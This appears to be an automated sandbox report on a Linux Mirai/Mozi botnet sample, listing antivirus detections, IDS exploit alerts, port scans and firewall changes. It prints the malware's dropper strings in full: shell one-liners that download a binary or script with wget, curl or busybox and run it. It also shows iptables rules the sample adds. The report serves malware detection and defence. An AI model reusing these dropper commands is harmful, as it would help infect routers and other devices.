Analysis Report i

AV Detection:

Antivirus / Scanner detection for submitted sample

Source: i

Avira: detected

Antivirus detection for dropped file

Source: /usr/networks

Avira: detection malicious, Label: LINUX/Mirai.lldau

Multi AV Scanner detection for submitted file

Source: i	Virustotal: Detection: 64%			Perma Link
Source: i	ReversingLabs: Detection: 68%

Spreading:

Found strings indicative of a multi-platform dropper

Source: i	String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: i	String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: i	String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'

Opens /proc/net/* files useful for finding connected devices and routers

Source: /tmp/i (PID: 4585)	Opens: /proc/net/route			Jump to behavior
Source: /tmp/i (PID: 4585)	Opens: /proc/net/route			Jump to behavior

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 38.126.144.18: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.247.205.165: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 193.8.201.1: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.86.244.254: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.248.64.225: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.228.95.181: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:39168 -> 212.12.160.58:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:39168 -> 212.12.160.58:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 168.95.22.153: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 59.92.218.209:8003 -> 192.168.2.20:28537
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 185.246.176.157:44790 -> 192.168.2.20:28537
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 85.106.8.102:11211 -> 192.168.2.20:28537
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.141.74.98:1900 -> 192.168.2.20:28537
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:38282 -> 203.152.217.144:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:38282 -> 203.152.217.144:80
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 58.97.206.33:41682 -> 192.168.2.20:28537
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 220.124.130.66:8083 -> 192.168.2.20:28537
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 111.92.80.183:31921 -> 192.168.2.20:28537
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.20:37296 -> 195.231.168.45:52869
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 14.46.31.88:8082 -> 192.168.2.20:28537
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 149.11.89.129: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.101.88.85: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.232.198.189: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 174.58.192.2: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.34.62.97: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.233.121.196: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 158.165.7.160: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:43552 -> 132.64.170.45:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:43552 -> 132.64.170.45:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:44388 -> 71.41.225.74:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.158.215.92: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:33166 -> 149.129.130.58:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:33166 -> 149.129.130.58:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.231.181.161: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:44076 -> 192.34.60.236:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:44076 -> 192.34.60.236:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:55366 -> 91.233.85.66:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:55366 -> 91.233.85.66:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:41050 -> 167.82.102.91:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:41050 -> 167.82.102.91:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 90.161.157.169: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.216.150.65: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 202.164.139.21:7049 -> 192.168.2.20:28537
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 69.92.67.36:57065 -> 192.168.2.20:28537
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.228.87.91: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 77.123.130.180: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:33674 -> 139.162.182.70:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:33674 -> 139.162.182.70:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.78.52.239: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 202.88.190.46: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 202.164.139.181:45563 -> 192.168.2.20:28537
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.247.172.145: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.228.84.167: -> 192.168.2.20:
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.210.67.167:80 -> 192.168.2.20:34316
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 78.34.32.117: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.212.28.148: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.238.97.92: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 64.33.158.155: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.157.131.61: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 204.148.10.26: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:47742 -> 15.161.88.49:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:47742 -> 15.161.88.49:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:48352 -> 23.214.76.71:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:48352 -> 23.214.76.71:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:58928 -> 103.47.16.235:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.142.196.62: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 80.169.237.142: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.11.2.209: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:50336 -> 178.88.225.33:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:50336 -> 178.88.225.33:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.97.32.88: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:48822 -> 115.160.28.65:8080
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:48822 -> 115.160.28.65:8080
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.33.139.238: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.64.229.37: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 154.218.71.141: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.220.250.219: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 37.138.45.246: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:56502 -> 82.75.175.45:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:56502 -> 82.75.175.45:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.157.186.236: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:48726 -> 113.161.79.231:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:48726 -> 113.161.79.231:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:41972 -> 15.237.62.51:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:41972 -> 15.237.62.51:80
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 100.100.104.30: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 212.158.129.246: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:54178 -> 13.249.130.85:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:54178 -> 13.249.130.85:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 147.52.1.114: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.214.251.101: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.142.100.71: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:34316 -> 23.210.67.167:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:37128 -> 85.214.105.212:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:53936 -> 81.6.188.111:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:57760 -> 92.246.94.253:80

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 167.166.165.188 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 94.97.187.163 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 13.79.188.4 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 29.187.230.13 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 160.232.142.171 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 185.70.34.103 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 159.137.4.249 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 84.209.208.168 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 14.52.177.146 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 221.1.41.110 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 148.162.250.199 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 161.29.217.202 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 67.54.192.184 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 84.72.187.149 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 34.79.180.38 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 94.91.145.21 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 135.37.73.197 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 122.169.104.138 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 40.40.5.248 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 17.23.29.251 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 166.134.109.188 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 86.118.67.217 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 91.179.250.42 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 205.210.8.73 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 80.201.9.77 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 71.213.157.134 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 198.126.3.49 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 149.233.217.118 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 71.22.117.26 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 108.232.119.42 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 157.11.78.115 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 48.107.62.30 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 98.146.234.218 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 47.130.183.87 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 71.4.197.241 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 181.38.107.98 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 122.180.52.190 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 133.216.170.67 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 194.82.200.72 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 220.206.246.179 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 117.2.162.63 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 136.183.108.224 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 161.95.84.239 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 9.120.128.78 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 119.91.50.120 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 94.224.106.104 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 147.138.192.17 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 12.56.91.65 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 52.124.66.249 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 117.126.78.88 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 27.56.236.234 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 189.161.71.91 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 30.229.23.209 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 202.47.233.125 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 112.175.198.136 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 184.71.180.110 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 52.199.115.5 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 72.17.101.201 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 75.189.55.206 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 97.19.237.236 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 20.125.190.187 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 78.17.25.87 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 106.61.88.206 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 201.211.65.138 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 20.194.139.143 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 12.129.41.73 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 217.200.122.135 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 120.70.220.231 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 139.43.104.61 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 175.244.146.57 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 204.235.190.199 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 202.30.107.204 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 63.125.68.17 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 81.113.147.127 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 64.241.138.149 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 61.94.47.96 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 59.58.132.156 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 76.94.216.22 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 21.235.195.37 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 37.63.64.215 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 187.68.238.155 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 150.45.123.229 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 14.27.161.132 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 112.2.90.90 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 100.134.89.123 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 196.104.68.208 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 163.252.150.224 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 54.218.19.80 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 167.1.169.103 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 150.180.237.213 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 117.12.79.28 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 162.85.63.56 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 185.61.14.146 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 148.174.162.66 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 72.153.111.43 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 24.150.114.54 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 64.153.76.145 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 7.251.184.10 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 149.212.155.111 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 197.75.185.233 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 20.117.119.104 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 66.11.10.33 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 101.13.186.3 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 167.35.185.166 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 218.232.129.53 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 71.27.191.205 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 44.220.245.95 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 19.35.140.38 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 178.232.217.232 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 150.250.137.224 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 83.105.227.81 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 113.9.130.10 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 174.97.64.130 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 146.164.113.65 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 116.177.55.129 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 197.64.140.241 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 150.142.183.220 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 57.36.162.225 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 214.79.226.46 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 96.208.251.9 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 21.72.133.117 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 193.229.210.90 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 66.131.138.161 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 47.205.159.249 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 128.214.130.86 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 206.79.214.122 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 120.118.238.58 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 96.203.33.213 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 175.130.144.51 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 173.46.232.71 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 68.239.197.132 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 45.90.39.155 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 154.75.144.11 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 28.46.159.218 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 42.11.46.133 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 151.37.83.166 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 12.241.220.138 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 130.177.18.137 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 146.204.28.33 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 29.14.27.225 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 146.210.131.27 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 218.229.107.98 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 39.192.165.164 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 59.252.33.99 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 177.234.114.180 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 133.90.62.93 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 50.247.39.46 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 52.161.190.104 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 1.210.36.98 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 6.47.161.79 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 108.180.252.214 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 121.98.76.63 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 218.93.19.234 ports 1,2,4,5,9,49152

Executes the "iptables" command to insert, remove and/or manipulate rules

Source: /bin/sh (PID: 4613)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4662)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4675)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4710)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4714)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4732)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4763)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4787)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 57738 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4860)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4878)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4897)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4909)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP			Jump to behavior
